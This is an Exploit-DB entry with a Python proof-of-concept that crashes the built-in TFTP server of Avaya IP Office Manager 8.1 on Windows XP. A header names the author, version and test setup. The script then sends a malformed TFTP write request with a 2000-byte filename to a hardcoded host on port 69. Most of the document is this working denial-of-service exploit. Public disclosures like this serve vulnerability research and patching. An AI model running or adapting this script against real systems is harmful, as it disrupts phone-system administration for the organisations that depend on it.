Avaya IP Office Manager 8.1 TFTP - Denial of Service

EDB-ID:

17045

CVE:





Platform:

Windows

Date:

2011-03-24


#Exploit Title: Avaya IP Office Manager TFTP DOS
#Version: Avaya IP Office Manager 8.1 (5)
#Author: Craig Freyman (cd1zz)
#Date: March 23, 2011
#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems. 
#There is a built in TFTP server that is used to update the firmware on phones. The TFTP service 
#is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
#Tested on: Windows XP SP3

#!/usr/bin/python
import socket

host = '192.168.133.131'
port = 69

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

crash = "A" * 2000

print "Sending crash...."
pwned = "\x00\x02" + "A" + "\x00" + crash + "\x00"
s.sendto(pwned, (host, port))